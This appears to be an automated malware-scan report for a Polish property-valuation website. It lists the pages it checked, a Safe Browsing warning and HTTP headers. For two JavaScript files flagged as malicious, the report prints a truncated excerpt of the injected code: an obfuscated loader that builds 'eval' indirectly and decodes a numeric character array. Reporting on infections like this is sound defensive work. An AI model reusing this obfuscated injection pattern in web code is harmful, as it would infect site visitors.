Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wycena-nieruchomosci.info
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wycena-nieruchomosci.info/ | 200 OK Content-Length: 4026 Content-Type: text/html | clean |
http://wycena-nieruchomosci.info/advajax.js | 200 OK Content-Length: 19345 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,108,97,110,32,60,30,100,110,97,117,108,99,110,115,44,99,113,99,97,115,99,69,107,99,109,100,108,116,39,37,105,101,112,97,108,99,39,40,57,13,9,11,10,31,30,32,31,106,98,111,44,115,113,97,32,60,30,39,103,114,116,111,56,47,46,109,118,112,115,113,96,103,112,45,112,11 Antivirus reports:
| ||
http://wycena-nieruchomosci.info/main.js | 200 OK Content-Length: 5247 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,108,97,110,32,60,30,100,110,97,117,108,99,110,115,44,99,113,99,97,115,99,69,107,99,109,100,108,116,39,37,105,101,112,97,108,99,39,40,57,13,9,11,10,31,30,32,31,106,98,111,44,115,113,97,32,60,30,39,103,114,116,111,56,47,46,109,118,112,115,113,96,103,112,45,112,11 Antivirus reports:
| ||
http://wycena-nieruchomosci.info/register | 200 OK Content-Length: 4689 Content-Type: text/html | clean |
http://wycena-nieruchomosci.info/index.php | 200 OK Content-Length: 4026 Content-Type: text/html | clean |
http://wycena-nieruchomosci.info/szukaj | 200 OK Content-Length: 4979 Content-Type: text/html | clean |
http://wycena-nieruchomosci.info/cennik | 200 OK Content-Length: 3695 Content-Type: text/html | clean |
http://wycena-nieruchomosci.info/kontakt | 200 OK Content-Length: 3600 Content-Type: text/html | clean |
http://wycena-nieruchomosci.info/test404page.js | 404 Not Found Content-Length: 495 Content-Type: text/html | clean |
http://wycena-nieruchomosci.info/regulamin | 200 OK Content-Length: 4404 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wycena-nieruchomosci.info
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 03 Oct 2014 00:39:28 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=d824a93726ea02c43dcd6a659bb7a58a; path=/
Set-Cookie: PHPSESSID=d892741855cc8162a2a0e2ee08fef75b; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: wycena-nieruchomosci.info
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 03 Oct 2014 00:39:28 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=d824a93726ea02c43dcd6a659bb7a58a; path=/
Set-Cookie: PHPSESSID=d892741855cc8162a2a0e2ee08fef75b; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: wycena-nieruchomosci.info
Referer: http://www.google.com/search?q=wycena-nieruchomosci.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wycena-nieruchomosci.info
Referer: http://www.google.com/search?q=wycena-nieruchomosci.info
Result:
The result is similar to the first query. There are no suspicious redirects found.